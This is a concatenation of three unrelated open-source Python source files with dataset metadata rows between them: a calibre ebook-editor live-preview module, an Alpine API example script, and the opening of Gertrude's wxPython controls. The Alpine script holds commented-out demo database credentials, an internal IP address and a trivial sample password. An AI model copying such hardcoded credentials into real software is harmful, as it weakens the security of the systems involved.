self.name, self.length, self.fingerprint, self.parsing_done, self.parsed_data is None)
class ParseWorker(Thread):
daemon = True
SLEEP_TIME = 1
def __init__(self):
Thread.__init__(self)
self.requests = Queue()
self.request_count = 0
self.parse_items = {}
self.launch_error = None
def run(self):
mod, func = 'calibre.gui2.tweak_book.preview', 'parse_html'
try:
# Connect to the worker and send a dummy job to initialize it
self.worker = offload_worker(priority='low')
self.worker(mod, func, '<p></p>')
except:
import traceback
traceback.print_exc()
self.launch_error = traceback.format_exc()
return
while True:
time.sleep(self.SLEEP_TIME)
x = self.requests.get()
requests = [x]
while True:
try:
requests.append(self.requests.get_nowait())
except Empty:
break
if shutdown in requests:
self.worker.shutdown()
break
request = sorted(requests, reverse=True)[0]
del requests
pi, data = request[1:]
try:
res = self.worker(mod, func, data)
except:
import traceback
traceback.print_exc()
else:
pi.parsing_done = True
parsed_data = res['result']
if res['tb']:
prints("Parser error:")
prints(res['tb'])
else:
pi.parsed_data = parsed_data
def add_request(self, name):
data = get_data(name)
ldata, hdata = len(data), hash(data)
pi = self.parse_items.get(name, None)
if pi is None:
self.parse_items[name] = pi = ParseItem(name)
else:
if pi.parsing_done and pi.length == ldata and pi.fingerprint == hdata:
return
pi.parsed_data = None
pi.parsing_done = False
pi.length, pi.fingerprint = ldata, hdata
self.requests.put((self.request_count, pi, data))
self.request_count += 1
def shutdown(self):
self.requests.put(shutdown)
def get_data(self, name):
return getattr(self.parse_items.get(name, None), 'parsed_data', None)
def clear(self):
self.parse_items.clear()
def is_alive(self):
return Thread.is_alive(self) or (hasattr(self, 'worker') and self.worker.is_alive())
parse_worker = ParseWorker()
# }}}
# Override network access to load data "live" from the editors {{{
class NetworkReply(QNetworkReply):
def __init__(self, parent, request, mime_type, name):
QNetworkReply.__init__(self, parent)
self.setOpenMode(QNetworkReply.ReadOnly | QNetworkReply.Unbuffered)
self.setRequest(request)
self.setUrl(request.url())
self._aborted = False
if mime_type in OEB_DOCS:
self.resource_name = name
QTimer.singleShot(0, self.check_for_parse)
else:
data = get_data(name)
if isinstance(data, type('')):
data = data.encode('utf-8')
mime_type += '; charset=utf-8'
self.__data = data
self.setHeader(QNetworkRequest.ContentTypeHeader, mime_type)
self.setHeader(QNetworkRequest.ContentLengthHeader, len(self.__data))
QTimer.singleShot(0, self.finalize_reply)
def check_for_parse(self):
if self._aborted:
return
data = parse_worker.get_data(self.resource_name)
if data is None:
return QTimer.singleShot(10, self.check_for_parse)
self.__data = data
self.setHeader(QNetworkRequest.ContentTypeHeader, 'application/xhtml+xml; charset=utf-8')
self.setHeader(QNetworkRequest.ContentLengthHeader, len(self.__data))
self.finalize_reply()
def bytesAvailable(self):
try:
return len(self.__data)
except AttributeError:
return 0
def isSequential(self):
return True
def abort(self):
self._aborted = True
def readData(self, maxlen):
ans, self.__data = self.__data[:maxlen], self.__data[maxlen:]
return ans
read = readData
def finalize_reply(self):
if self._aborted:
return
self.setFinished(True)
self.setAttribute(QNetworkRequest.HttpStatusCodeAttribute, 200)
self.setAttribute(QNetworkRequest.HttpReasonPhraseAttribute, "Ok")
self.metaDataChanged.emit()
self.downloadProgress.emit(len(self.__data), len(self.__data))
self.readyRead.emit()
self.finished.emit()
class NetworkAccessManager(QNetworkAccessManager):
OPERATION_NAMES = {getattr(QNetworkAccessManager, '%sOperation'%x) :
x.upper() for x in ('Head', 'Get', 'Put', 'Post', 'Delete',
'Custom')
}
def __init__(self, *args):
QNetworkAccessManager.__init__(self, *args)
self.current_root = None
self.cache = QNetworkDiskCache(self)
self.setCache(self.cache)
self.cache.setCacheDirectory(PersistentTemporaryDirectory(prefix='disk_cache_'))
self.cache.setMaximumCacheSize(0)
def createRequest(self, operation, request, data):
url = unicode(request.url().toString(QUrl.None))
if operation == self.GetOperation and url.startswith('file://'):
path = url[7:]
if iswindows and path.startswith('/'):
path = path[1:]
c = current_container()
try:
name = c.abspath_to_name(path, root=self.current_root)
except ValueError: # Happens on windows with absolute paths on different drives
name = None
if c.has_name(name):
try:
return NetworkReply(self, request, c.mime_map.get(name, 'application/octet-stream'), name)
except Exception:
import traceback
traceback.print_exc()
return QNetworkAccessManager.createRequest(self, operation, request, data)
# }}}
def uniq(vals):
''' Remove all duplicates from vals, while preserving order. '''
vals = vals or ()
seen = set()
seen_add = seen.add
return tuple(x for x in vals if x not in seen and not seen_add(x))
def find_le(a, x):
'Find rightmost value in a less than or equal to x'
try:
return a[bisect_right(a, x)]
except IndexError:
return a[-1]
class WebPage(QWebPage):
sync_requested = pyqtSignal(object, object, object)
split_requested = pyqtSignal(object, object)
def __init__(self, parent):
QWebPage.__init__(self, parent)
settings = self.settings()
apply_settings(settings, config().parse())
settings.setMaximumPagesInCache(0)
settings.setAttribute(settings.JavaEnabled, False)
settings.setAttribute(settings.PluginsEnabled, False)
settings.setAttribute(settings.PrivateBrowsingEnabled, True)
settings.setAttribute(settings.JavascriptCanOpenWindows, False)
settings.setAttribute(settings.JavascriptCanAccessClipboard, False)
settings.setAttribute(settings.LinksIncludedInFocusChain, False)
settings.setAttribute(settings.DeveloperExtrasEnabled, True)
settings.setDefaultTextEncoding('utf-8')
data = 'data:text/css;charset=utf-8;base64,'
css = '[data-in-split-mode="1"] [data-is-block="1"]:hover { cursor: pointer !important; border-top: solid 5px green !important }'
data += b64encode(css.encode('utf-8'))
settings.setUserStyleSheetUrl(QUrl(data))
self.setNetworkAccessManager(NetworkAccessManager(self))
self.setLinkDelegationPolicy(self.DelegateAllLinks)
self.mainFrame().javaScriptWindowObjectCleared.connect(self.init_javascript)
self.init_javascript()
@dynamic_property
def current_root(self):
def fget(self):
return self.networkAccessManager().current_root
def fset(self, val):
self.networkAccessManager().current_root = val
return property(fget=fget, fset=fset)
def javaScriptConsoleMessage(self, msg, lineno, source_id):
prints('preview js:%s:%s:'%(unicode(source_id), lineno), unicode(msg))
def init_javascript(self):
if not hasattr(self, 'js'):
from calibre.utils.resources import compiled_coffeescript
self.js = compiled_coffeescript('ebooks.oeb.display.utils', dynamic=False)
self.js += P('csscolorparser.js', data=True, allow_user_override=False)
self.js += compiled_coffeescript('ebooks.oeb.polish.preview', dynamic=False)
self._line_numbers = None
mf = self.mainFrame()
mf.addToJavaScriptWindowObject("py_bridge", self)
mf.evaluateJavaScript(self.js)
@pyqtSlot(str, str, str)
def request_sync(self, tag_name, href, sourceline_address):
try:
self.sync_requested.emit(unicode(tag_name), unicode(href), json.loads(unicode(sourceline_address)))
except (TypeError, ValueError, OverflowError, AttributeError):
pass
def go_to_anchor(self, anchor, lnum):
self.mainFrame().evaluateJavaScript('window.calibre_preview_integration.go_to_anchor(%s, %s)' % (
json.dumps(anchor), json.dumps(str(lnum))))
@pyqtSlot(str, str)
def request_split(self, loc, totals):
actions['split-in-preview'].setChecked(False)
loc, totals = json.loads(unicode(loc)), json.loads(unicode(totals))
if not loc or not totals:
return error_dialog(self.view(), _('Invalid location'),
_('Cannot split on the body tag'), show=True)
self.split_requested.emit(loc, totals)
@property
def line_numbers(self):
if self._line_numbers is None:
def atoi(x):
try:
ans = int(x)
except (TypeError, ValueError):
ans = None
return ans
val = self.mainFrame().evaluateJavaScript('window.calibre_preview_integration.line_numbers()')
self._line_numbers = sorted(uniq(filter(lambda x:x is not None, map(atoi, val))))
return self._line_numbers
def go_to_line(self, lnum):
try:
lnum = find_le(self.line_numbers, lnum)
except IndexError:
return
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.go_to_line(%d)' % lnum)
def go_to_sourceline_address(self, sourceline_address):
lnum, tags = sourceline_address
if lnum is None:
return
tags = [x.lower() for x in tags]
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.go_to_sourceline_address(%d, %s)' % (lnum, json.dumps(tags)))
def split_mode(self, enabled):
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.split_mode(%s)' % (
'true' if enabled else 'false'))
class WebView(QWebView):
def __init__(self, parent=None):
QWebView.__init__(self, parent)
self.inspector = QWebInspector(self)
w = QApplication.instance().desktop().availableGeometry(self).width()
self._size_hint = QSize(int(w/3), int(w/2))
self._page = WebPage(self)
self.setPage(self._page)
self.inspector.setPage(self._page)
self.clear()
self.setAcceptDrops(False)
def sizeHint(self):
return self._size_hint
def refresh(self):
self.pageAction(self.page().Reload).trigger()
@dynamic_property
def scroll_pos(self):
def fget(self):
mf = self.page().mainFrame()
return (mf.scrollBarValue(Qt.Horizontal), mf.scrollBarValue(Qt.Vertical))
def fset(self, val):
mf = self.page().mainFrame()
mf.setScrollBarValue(Qt.Horizontal, val[0])
mf.setScrollBarValue(Qt.Vertical, val[1])
return property(fget=fget, fset=fset)
def clear(self):
self.setHtml(_(
'''
<h3>Live preview</h3>
<p>Here you will see a live preview of the HTML file you are currently editing.
The preview will update automatically as you make changes.
<p style="font-size:x-small; color: gray">Note that this is a quick preview
only, it is not intended to simulate an actual ebook reader. Some
aspects of your ebook will not work, such as page breaks and page margins.
'''))
self.page().current_root = None
def setUrl(self, qurl):
self.page().current_root = current_container().root
return QWebView.setUrl(self, qurl)
def inspect(self):
self.inspector.parent().show()
self.inspector.parent().raise_()
self.pageAction(self.page().InspectElement).trigger()
def contextMenuEvent(self, ev):
menu = QMenu(self)
p = self.page()
mf = p.mainFrame()
r = mf.hitTestContent(ev.pos())
url = unicode(r.linkUrl().toString(QUrl.None)).strip()
ca = self.pageAction(QWebPage.Copy)
if ca.isEnabled():
menu.addAction(ca)
menu.addAction(actions['reload-preview'])
menu.addAction(QIcon(I('debug.png')), _('Inspect element'), self.inspect)
if url.partition(':')[0].lower() in {'http', 'https'}:
menu.addAction(_('Open link'), partial(open_url, r.linkUrl()))
menu.exec_(ev.globalPos())
class Preview(QWidget):
sync_requested = pyqtSignal(object, object)
split_requested = pyqtSignal(object, object, object)
split_start_requested = pyqtSignal()
link_clicked = pyqtSignal(object, object)
refresh_starting = pyqtSignal()
refreshed = pyqtSignal()
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.l = l = QVBoxLayout()
self.setLayout(l)
l.setContentsMargins(0, 0, 0, 0)
self.view = WebView(self)
self.view.page().sync_requested.connect(self.request_sync)
self.view.page().split_requested.connect(self.request_split)
self.view.page().loadFinished.connect(self.load_finished)
self.inspector = self.view.inspector
self.inspector.setPage(self.view.page())
l.addWidget(self.view)
self.bar = QToolBar(self)
l.addWidget(self.bar)
ac = actions['auto-reload-preview']
ac.setCheckable(True)
ac.setChecked(True)
ac.toggled.connect(self.auto_reload_toggled)
self.auto_reload_toggled(ac.isChecked())
self.bar.addAction(ac)
ac = actions['sync-preview-to-editor']
ac.setCheckable(True)
ac.setChecked(True)
ac.toggled.connect(self.sync_toggled)
self.sync_toggled(ac.isChecked())
self.bar.addAction(ac)
self.bar.addSeparator()
ac = actions['split-in-preview']
ac.setCheckable(True)
ac.setChecked(False)
ac.toggled.connect(self.split_toggled)
self.split_toggled(ac.isChecked())
self.bar.addAction(ac)
ac = actions['reload-preview']
ac.triggered.connect(self.refresh)
self.bar.addAction(ac)
actions['preview-dock'].toggled.connect(self.visibility_changed)
self.current_name = None
self.last_sync_request = None
self.refresh_timer = QTimer(self)
self.refresh_timer.timeout.connect(self.refresh)
parse_worker.start()
self.current_sync_request = None
self.search = HistoryLineEdit2(self)
self.search.initialize('tweak_book_preview_search')
self.search.setPlaceholderText(_('Search in preview'))
self.search.returnPressed.connect(partial(self.find, 'next'))
self.bar.addSeparator()
self.bar.addWidget(self.search)
for d in ('next', 'prev'):
ac = actions['find-%s-preview' % d]
ac.triggered.connect(partial(self.find, d))
self.bar.addAction(ac)
def find(self, direction):
text = unicode(self.search.text())
self.view.findText(text, QWebPage.FindWrapsAroundDocument | (
QWebPage.FindBackward if direction == 'prev' else QWebPage.FindFlags(0)))
def request_sync(self, tagname, href, lnum):
if self.current_name:
c = current_container()
if tagname == 'a' and href:
if href and href.startswith('#'):
name = self.current_name
else:
name = c.href_to_name(href, self.current_name) if href else None
if name == self.current_name:
return self.view.page().go_to_anchor(urlparse(href).fragment, lnum)
if name and c.exists(name) and c.mime_map[name] in OEB_DOCS:
return self.link_clicked.emit(name, urlparse(href).fragment or TOP)
self.sync_requested.emit(self.current_name, lnum)
def request_split(self, loc, totals):
if self.current_name:
self.split_requested.emit(self.current_name, loc, totals)
def sync_to_editor(self, name, sourceline_address):
self.current_sync_request = (name, sourceline_address)
QTimer.singleShot(100, self._sync_to_editor)
def _sync_to_editor(self):
if not actions['sync-preview-to-editor'].isChecked():
return
try:
if self.refresh_timer.isActive() or self.current_sync_request[0] != self.current_name:
return QTimer.singleShot(100, self._sync_to_editor)
except TypeError:
return # Happens if current_sync_request is None
sourceline_address = self.current_sync_request[1]
self.current_sync_request = None
self.view.page().go_to_sourceline_address(sourceline_address)
def report_worker_launch_error(self):
if parse_worker.launch_error is not None:
tb, parse_worker.launch_error = parse_worker.launch_error, None
error_dialog(self, _('Failed to launch worker'), _(
'Failed to launch the worker process used for rendering the preview'), det_msg=tb, show=True)
def show(self, name):
if name != self.current_name:
self.refresh_timer.stop()
self.current_name = name
self.report_worker_launch_error()
parse_worker.add_request(name)
self.view.setUrl(QUrl.fromLocalFile(current_container().name_to_abspath(name)))
return True
def refresh(self):
if self.current_name:
self.refresh_timer.stop()
# This will check if the current html has changed in its editor,
# and re-parse it if so
self.report_worker_launch_error()
parse_worker.add_request(self.current_name)
# Tell webkit to reload all html and associated resources
current_url = QUrl.fromLocalFile(current_container().name_to_abspath(self.current_name))
self.refresh_starting.emit()
if current_url != self.view.url():
# The container was changed
self.view.setUrl(current_url)
else:
self.view.refresh()
self.refreshed.emit()
def clear(self):
self.view.clear()
self.current_name = None
@property
def current_root(self):
return self.view.page().current_root
@property
def is_visible(self):
return actions['preview-dock'].isChecked()
@property
def live_css_is_visible(self):
try:
return actions['live-css-dock'].isChecked()
except KeyError:
return False
def start_refresh_timer(self):
if self.live_css_is_visible or (self.is_visible and actions['auto-reload-preview'].isChecked()):
self.refresh_timer.start(tprefs['preview_refresh_time'] * 1000)
def stop_refresh_timer(self):
self.refresh_timer.stop()
def auto_reload_toggled(self, checked):
if self.live_css_is_visible and not actions['auto-reload-preview'].isChecked():
actions['auto-reload-preview'].setChecked(True)
error_dialog(self, _('Cannot disable'), _(
'Auto reloading of the preview panel cannot be disabled while the'
' Live CSS panel is open.'), show=True)
actions['auto-reload-preview'].setToolTip(_(
'Auto reload preview when text changes in editor') if not checked else _(
'Disable auto reload of preview'))
def sync_toggled(self, checked):
actions['sync-preview-to-editor'].setToolTip(_(
'Disable syncing of preview position to editor position') if checked else _(
'Enable syncing of preview position to editor position'))
def visibility_changed(self, is_visible):
if is_visible:
self.refresh()
def split_toggled(self, checked):
actions['split-in-preview'].setToolTip(textwrap.fill(_(
'Abort file split') if checked else _(
'Split this file at a specified location.\n\nAfter clicking this button, click'
' inside the preview panel above at the location you want the file to be split.')))
if checked:
self.split_start_requested.emit()
else:
self.view.page().split_mode(False)
def do_start_split(self):
self.view.page().split_mode(True)
def stop_split(self):
actions['split-in-preview'].setChecked(False)
def load_finished(self, ok):
if actions['split-in-preview'].isChecked():
if ok:
self.do_start_split()
else:
self.stop_split()
def apply_settings(self):
s = self.view.page().settings()
s.setFontSize(s.DefaultFontSize, tprefs['preview_base_font_size'])
s.setFontSize(s.DefaultFixedFontSize, tprefs['preview_mono_font_size'])
s.setFontSize(s.MinimumLogicalFontSize, tprefs['preview_minimum_font_size'])
s.setFontSize(s.MinimumFontSize, tprefs['preview_minimum_font_size'])
sf, ssf, mf = tprefs['preview_serif_family'], tprefs['preview_sans_family'], tprefs['preview_mono_family']
s.setFontFamily(s.StandardFont, {'serif':sf, 'sans':ssf, 'mono':mf, None:sf}[tprefs['preview_standard_font_family']])
s.setFontFamily(s.SerifFont, sf)
s.setFontFamily(s.SansSerifFont, ssf)
s.setFontFamily(s.FixedFont, mf)
| gpl-3.0 | -1,991,309,667,338,330,600 | 37.471582 | 137 | 0.615053 | false | 3.913281 | false | false | false |
AlpineNow/python-alpine-api | examples/workfile.py | 1 | 10557 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Alpine Data, Inc.
# Copyright 2017 Alpine Data All Rights reserved.
"""Simple Command-Line Sample For Alpine API.
Command-line application to login and logout with Alpine API
Usage:
$ python workfile.py
To get detailed log output run:
$ python workfile.py --logging_level=DEBUG
"""
import logging
import sys
import time
from alpine.exception import *
from alpine import *
from future.datasource import DataSource
def help():
print("Usage: host=[host] port=[port] user=[username] password=[password]")
def setUp(alpine_host, alpine_port, username, password):
global db_data_source_id
global hadoop_data_source_id
global sample_datasource_db_name
global sample_datasource_hadoop_name
sample_datasource_db_name = "Demo_GP"
sample_datasource_hadoop_name = "Demo_Hadoop"
alpine_session = APIClient(alpine_host, alpine_port)
# Login with the admin user credential
alpine_session.login(username, password)
db_data_source_id = alpine_session.datasource.get_id(sample_datasource_db_name, "Database")
hadoop_data_source_id = alpine_session.datasource.get_id(sample_datasource_hadoop_name, "Hadoop")
# # Demo Database Info (Greenplum)
# sample_datasource_db_description = "Test Greenplum"
# sample_datasource_db_host = "10.10.0.151"
# sample_datasource_db_port = 5432
# sample_datasource_db_database_name = "miner_demo"
# sample_datasource_db_database_username = "miner_demo"
# sample_datasource_db_database_password = "miner_demo"
#
# # Demo Hadoop Info (Cloudera CDH5.7)
# sample_datasource_hadoop_version_string = "Cloudera CDH5.4-5.7"
# sample_datasource_hadoop_description = "Test Cloudera"
# sample_datasource_hadoop_namenode_host = "awscdh57singlenode.alpinenow.local"
# sample_datasource_hadoop_namenode_port = 8020
# sample_datasource_hadoop_resource_manager_host = "awscdh57singlenode.alpinenow.local"
# sample_datasource_hadoop_resource_manager_port = 8032
# sample_datasource_hadoop_username = "yarn"
# sample_datasource_hadoop_group_list = "hadoop"
# sample_datasource_hadoop_additional_parameters = [
# {"key": "mapreduce.jobhistory.address", "value": "awscdh57singlenode.alpinenow.local:10020"},
# {"key": "mapreduce.jobhistory.webapp.address", "value": "awscdh57singlenode.alpinenow.local:19888"},
# {"key": "yarn.app.mapreduce.am.staging-dir", "value": "/tmp"},
# {"key": "yarn.resourcemanager.admin.address", "value": "awscdh57singlenode.alpinenow.local:8033"},
# {"key": "yarn.resourcemanager.resource-tracker.address",
# "value": "awscdh57singlenode.alpinenow.local:8031"},
# {"key": "yarn.resourcemanager.scheduler.address", "value": "awscdh57singlenode.alpinenow.local:8030"}
# ]
# ds = DataSource(alpine_session.base_url, alpine_session.session, alpine_session.token)
# ds.delete_db_data_source_if_exists(sample_datasource_db_name)
# datasource_gp = ds.add_greenplum_data_source(sample_datasource_db_name,
# sample_datasource_db_description,
# sample_datasource_db_host,
# sample_datasource_db_port,
# sample_datasource_db_database_name,
# sample_datasource_db_database_username,
# sample_datasource_db_database_password)
#
# # Create a Hadoop datasource
# ds.delete_hadoop_data_source_if_exists(sample_datasource_hadoop_name)
#
# datasource_hadoop = ds.add_hadoop_data_source(sample_datasource_hadoop_version_string,
# sample_datasource_hadoop_name,
# sample_datasource_hadoop_description,
# sample_datasource_hadoop_namenode_host,
# sample_datasource_hadoop_namenode_port,
# sample_datasource_hadoop_resource_manager_host,
# sample_datasource_hadoop_resource_manager_port,
# sample_datasource_hadoop_username,
# sample_datasource_hadoop_group_list,
# sample_datasource_hadoop_additional_parameters
# )
#
# db_data_source_id = datasource_gp['id']
# hadoop_data_source_id = datasource_hadoop['id']
def tearDown(alpine_host, alpine_port, username, password):
sample_username = "test_user"
sample_workspace_name = "API Sample Workspace"
alpine_session = APIClient(alpine_host, alpine_port)
# Login with the admin user credential
alpine_session.login(username, password)
# Delete the Datasource
# alpine_session.datasource.delete_db_data_source(sample_datasource_db_name)
# response = alpine_session.datasource.delete_hadoop_data_source(sample_datasource_hadoop_name)
# Delete the workspace
response = alpine_session.workspace.delete_workspace(sample_workspace_name)
print("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
# Delete the user.
response = alpine_session.user.delete_user(sample_username)
print("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
def main(alpine_host, alpine_port, username, password):
alpine_host = alpine_host
alpine_port = alpine_port
# Use the setup function to create datasource for use
setUp(alpine_host, alpine_port, username, password)
sample_username = "test_user"
sample_password = "password"
sample_firstname = "First"
sample_lastname = "Last"
sample_member_role = "Business Analyst"
sample_email = "[email protected]"
sample_title = "Title"
sample_deparment = "Department"
sample_admin_type = "admin"
sample_user_type = "analytics_developer"
sample_workspace_name = "API Sample Workspace"
sample_workspace_public_state_true = True
# Create a APIClient session
# alpine_session = APIClient(alpine_host, alpine_port)
# alpine_session.login(username, password)
alpine_session = APIClient(alpine_host, alpine_port, username, password)
# Logging Examples
# use default logger
alpine_session.logger.debug("This is a debug message")
alpine_session.logger.info("This is a info message")
alpine_session.logger.error("This is a error message")
# use a custom logger
custom_logger = logging.getLogger("custom")
custom_logger.debug("This is a custom debug message")
custom_logger.info("This is a custom info message")
custom_logger.error("This is a custom error message")
# Workspace Examples
# Delete sample workspaces if exists
try:
workspace_id = alpine_session.workspace.get_id(workspace_name=sample_workspace_name)
alpine_session.workspace.delete(workspace_id)
except WorkspaceNotFoundException:
pass
# Create a new sample workspace
workspace_info = alpine_session.workspace.create(workspace_name=sample_workspace_name, public=sample_workspace_public_state_true,
summary="")
workspace_id = workspace_info['id']
# User Examples
# Create a new sample user with admin roles
try:
user_id = alpine_session.user.get_id(sample_username)
alpine_session.user.delete(user_id)
except UserNotFoundException:
pass
user_info = alpine_session.user.create(sample_username, sample_password, sample_firstname, sample_lastname, sample_email,
sample_title, sample_deparment, admin_role=sample_admin_type, app_role=sample_user_type)
member_list = alpine_session.workspace.member.add(workspace_id, user_info['id'], sample_member_role)
# Workflow Examples
afm_path = "afm/demo_hadoop_row_filter_regression.afm"
try:
workfile_id = alpine_session.workfile.get_id("demo_hadoop_row_filter_regression", workspace_id)
alpine_session.workfile.delete(workfile_id)
except WorkfileNotFoundException:
pass
datasource_info = [{"data_source_type": alpine_session.datasource.dsType.HadoopCluster,
"data_source_id": hadoop_data_source_id
}]
workfile_info = alpine_session.workfile.upload(workspace_info['id'], afm_path, datasource_info)
print("Uploaded Workfile Info: {0}".format(workfile_info))
variables = [{"name": "@min_credit_line", "value": "7"}]
process_id = alpine_session.workfile.process.run(workfile_info['id'], variables)
workfile_status = None
max_waiting_seconds = 100
for i in range(0, max_waiting_seconds):
workfile_status = alpine_session.workfile.process.query_status(process_id)
if workfile_status in ["WORKING"]:
time.sleep(10)
elif workfile_status == "FINISHED":
print("Workfile Finished after waiting for {0} seconds".format(i*10))
break
else:
raise RunFlowFailureException("Workflow run into unexpected stage: {0}".format(workfile_status))
if workfile_status != "FINISHED":
raise RunFlowFailureException("Run Flow not Finished after running for {0} seconds"
.format(max_waiting_seconds*10))
# Use the Tear dowon function to delete the datasource if needed
# tearDown(alpine_host, alpine_port, username, password)
if __name__ == '__main__':
self = sys.modules['__main__']
if len(sys.argv) >= 5:
host = sys.argv[1].split('=')[1]
port = sys.argv[2].split('=')[1]
username = sys.argv[3].split('=')[1]
password = sys.argv[4].split('=')[1]
main(host, port, username,password)
else:
help() | mit | -3,272,726,833,132,391,400 | 47.431193 | 133 | 0.6176 | false | 3.844501 | false | false | false |
studio1247/gertrude | controls.py | 1 | 45793 | # -*- coding: utf-8 -*-
# This file is part of Gertrude.
#
# Gertrude is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Gertrude is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Gertrude; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
import wx
import wx.lib
import wx.lib.scrolledpanel
import wx.lib.masked
import wx.lib.stattext
import wx.combo
from wx.lib.masked import Field
from helpers import *
from functions import *
from config import config
from history import Change, Insert, Delete
class GPanel(wx.Panel):
def __init__(self, parent, title):
wx.Panel.__init__(self, parent, style=wx.LB_DEFAULT)
self.sizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.BoxSizer(wx.HORIZONTAL)
if sys.platform == 'win32':
st = wx.StaticText(self, -1, title, size=(-1, 24), style=wx.BORDER_SUNKEN | wx.ST_NO_AUTORESIZE)
font = wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD)
else:
st = wx.lib.stattext.GenStaticText(self, -1, ' ' + title, size=(-1, 28),
style=wx.BORDER_SUNKEN | wx.ST_NO_AUTORESIZE)
font = st.GetFont()
font.SetPointSize(14)
st.SetFont(font)
st.SetBackgroundColour(wx.Colour(10, 36, 106))
st.SetBackgroundStyle(wx.BG_STYLE_COLOUR)
st.SetForegroundColour(wx.Colour(255, 255, 255))
sizer.Add(st, 1, wx.EXPAND)
self.sizer.Add(sizer, 0, wx.EXPAND | wx.ALIGN_CENTER_VERTICAL | wx.BOTTOM, 5)
self.SetSizer(self.sizer)
self.SetAutoLayout(1)
def UpdateContents(self):
pass
class NumericCtrl(wx.TextCtrl):
def __init__(self, parent, id=-1, value="", min=None, max=None, precision=3, action_kw={}, *args, **kwargs):
self.__digits = '0123456789.-'
self.__prec = precision
self.format = '%.' + str(self.__prec) + 'f'
self.__val = 0
self.__min, self.__max = None, None
if max is not None:
self.__max = float(max)
if min is not None:
self.__min = float(min)
wx.TextCtrl.__init__(self, parent, id, value=value, *args, **kwargs)
self.Bind(wx.EVT_CHAR, self.onChar)
def SetPrecision(self, p):
self.__prec = p
self.format = '%.' + str(self.__prec) + 'f'
def onChar(self, event):
""" on Character event"""
key = event.KeyCode
entry = wx.TextCtrl.GetValue(self).strip()
# 2. other non-text characters are passed without change
if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255:
event.Skip()
return
# 3. check for multiple '.' and out of place '-' signs and ignore these
# note that chr(key) will now work due to return at #2
pos = wx.TextCtrl.GetSelection(self)[0]
has_minus = '-' in entry
if ((chr(key) == '.' and (self.__prec == 0 or '.' in entry)) or
(chr(key) == '-' and (has_minus or pos != 0 or (self.__min is not None and self.__min >= 0))) or
(chr(key) != '-' and has_minus and pos == 0)):
return
# 4. allow digits, but not other characters
if chr(key) in self.__digits:
event.Skip()
return
def GetValue(self):
if wx.TextCtrl.GetValue(self) == "":
return None
elif self.__prec > 0:
return float(wx.TextCtrl.GetValue(self))
else:
return int(wx.TextCtrl.GetValue(self))
# def __Text_SetValue(self,value):
def SetValue(self, value):
if value != "":
wx.TextCtrl.SetValue(self, self.format % float(value))
else:
wx.TextCtrl.SetValue(self, "")
self.Refresh()
def GetMin(self):
return self.__min
def GetMax(self):
return self.__max
def SetMin(self, min):
try:
self.__min = float(min)
except:
pass
return self.__min
def SetMax(self, max):
try:
self.__max = float(max)
except:
pass
return self.__max
PHONECTRL_WIDTH = 0
class PhoneCtrl(wx.TextCtrl):
def __init__(self, parent, id, value=None, action_kw={}, *args, **kwargs):
global PHONECTRL_WIDTH
self.__digits = '0123456789'
# this_sty = wx.TAB_TRAVERSAL| wx.TE_PROCESS_ENTER
kw = kwargs
wx.TextCtrl.__init__(self, parent.GetWindow(), id, size=(-1, -1), *args, **kw)
self.SetMaxLength(14)
if PHONECTRL_WIDTH == 0:
dc = wx.WindowDC(self)
PHONECTRL_WIDTH = dc.GetMultiLineTextExtent("00 00 00 00 00", self.GetFont())[0]
self.SetMinSize((PHONECTRL_WIDTH + 15, -1))
wx.EVT_CHAR(self, self.onChar)
wx.EVT_TEXT(self, -1, self.checkSyntax)
wx.EVT_LEFT_DOWN(self, self.OnLeftDown)
def onChar(self, event):
""" on Character event"""
ip = self.GetInsertionPoint()
lp = self.GetLastPosition()
key = event.KeyCode
# 2. other non-text characters are passed without change
if key == wx.WXK_BACK:
if ip > 0:
self.RemoveChar(ip - 1)
return
if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255:
event.Skip()
wx.CallAfter(self.Arrange, key)
return
# 4. allow digits, but not other characters
if chr(key) in self.__digits:
event.Skip()
wx.CallAfter(self.Arrange, key)
def checkSyntax(self, event=None):
value = self.GetValue()
if value != "" and len(value) != 14:
self.SetBackgroundColour(wx.RED)
else:
self.SetBackgroundColour(wx.WHITE)
self.Refresh()
event.Skip()
def Arrange(self, key):
ip = self.GetInsertionPoint()
lp = self.GetLastPosition()
sel = self.GetSelection()
value = self.GetValue()
tmp = self.GetValue().replace(" ", "")
arranged = ""
for c in tmp:
if c in self.__digits:
arranged += c
if len(arranged) < 14 and len(arranged) % 3 == 2:
arranged += " "
else:
ip -= 1
if arranged != value:
self.SetValue(arranged)
if sel == (ip, ip) or arranged != value:
if (ip == len(arranged) or arranged[ip] != " "):
self.SetInsertionPoint(ip)
elif key == wx.WXK_LEFT:
self.SetInsertionPoint(ip - 1)
else:
self.SetInsertionPoint(ip + 1)
def RemoveChar(self, index):
value = self.GetValue()
if value[index] == " ":
value = value[:index - 1] + value[index + 1:]
index -= 1
else:
value = value[:index] + value[index + 1:]
self.SetValue(value)
self.SetInsertionPoint(index)
self.Arrange(wx.WXK_BACK)
def OnLeftDown(self, event):
if event.LeftDown():
event.Skip()
wx.CallAfter(self.OnCursorMoved, event)
def OnCursorMoved(self, event):
ip = self.GetInsertionPoint()
if ip < 14 and ip % 3 == 2:
self.SetInsertionPoint(ip + 1)
if 0: # sys.platform == 'win32':
class DateCtrl(wx.GenericDatePickerCtrl):
def SetValue(self, date):
if date is None:
date = wx.DefaultDateTime
if isinstance(date, (datetime.datetime, datetime.date)):
tt = date.timetuple()
dmy = (tt[2], tt[1] - 1, tt[0])
date = wx.DateTimeFromDMY(*dmy)
